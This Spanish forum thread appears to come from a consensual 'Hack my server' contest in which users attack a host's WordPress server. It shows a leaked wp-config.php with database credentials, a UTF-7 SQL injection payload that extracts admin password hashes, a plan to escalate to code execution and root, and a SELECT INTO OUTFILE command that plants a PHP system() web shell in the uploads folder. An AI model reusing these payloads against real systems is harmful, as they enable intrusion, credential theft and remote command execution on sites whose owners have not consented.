Autor
|
Tema: Hack my server II (Leído 87,657 veces)
|
#!drvy
|
¿El wp_config.php lo puedes ver usando el infile? :O Se.. <?php // ** MySQL settings ** // define('DB_NAME', 'hackme2'); // The name of th... define('DB_USER', 'root'); // Your MySQL usern... define('DB_PASSWORD', ''); // ...and password define('DB_HOST', 'localhost'); // 99% chance y... // You can have multiple installations in one data... $table_prefix = 'wp_'; // Only numbers, letters... // Change this to localize WordPress. A correspon... // chosen language must be installed to wp-include... // For example, install de.mo to wp-includes/langu... // to enable German language support. /* That's all, stop editing! Happy blogging. */ require_once(ABSPATH.'wp-settings.php'); ?>
Saludos
|
|
|
En línea
|
|
|
|
#!drvy
|
@MinusFour como conseguiste ejecutar PHP ?
Saludos
|
|
|
En línea
|
|
|
|
WHK
|
aca va la inyeccion sql que estoy probando: charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- - Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell). Debo irme a mi casa, adios.
|
|
|
En línea
|
|
|
|
MinusFour
|
@MinusFour como conseguiste ejecutar PHP ?
Saludos
No lo he podido lograr todavía, por alguna razón no escapa las comillas xD. Pero está esto: http://blog.sjinks.pro/wordpress/858-information-disclosure-via-sql-injection-attack/Por cierto WHK te dejaste la IP en tus logs. Edit: Noup, por más que lo intento las comillas las escapan y las imprimen, así que me imagino que esa vulnerabilidad no puede ejecutar código php.
|
|
« Última modificación: 2 Agosto 2014, 00:20 am por MinusFour »
|
En línea
|
|
|
|
dimitrix
|
Carpeta con permisos de escritura, lista!
|
|
|
En línea
|
|
|
|
WIитX
Desconectado
Mensajes: 1.026
WINTX
|
aca va la inyeccion sql que estoy probando: charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- - Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell). Debo irme a mi casa, adios. Que asco dais D: iros de aquí eso no vale ABUSONES!!
|
|
|
En línea
|
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
|
|
|
MinusFour
|
Carpeta con permisos de escritura, lista!
¿Entonces ahora podemos escribir en /var/www? ¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura?
|
|
|
En línea
|
|
|
|
dimitrix
|
¿Entonces ahora podemos escribir en /var/www?
¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura No. Sólo la carpeta uploads de WP...
|
|
|
En línea
|
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Ya he copiado un un acceso a la shell
-> c.php?cmd=
SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>' INTO OUTFILE '/var/www/wp-content/uploads/c.php'
|
|
|
En línea
|
|
|
|
dimitrix
|
Como subiste la Shell? :-)
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Counter Strike 1.5 Hack Server
Juegos y Consolas
|
*StoW*
|
0
|
3,689
|
19 Octubre 2006, 22:22 pm
por *StoW*
|
|
|
Internal Server Error(hack web cross)
WarZone
|
Angbroda
|
5
|
6,426
|
3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
|
|
|
Torneo Hack my Server
« 1 2 ... 6 7 »
Foro Libre
|
dimitrix
|
62
|
23,193
|
1 Agosto 2014, 03:04 am
por dimitrix
|
|
|
Hack My Server III
« 1 2 »
Foro Libre
|
dimitrix
|
16
|
6,668
|
30 Marzo 2015, 18:47 pm
por elmatador2
|
|
|
Hack my server 2018
« 1 2 »
Hacking
|
dimitrix
|
16
|
19,818
|
28 Mayo 2018, 22:06 pm
por hitori batusai
|
|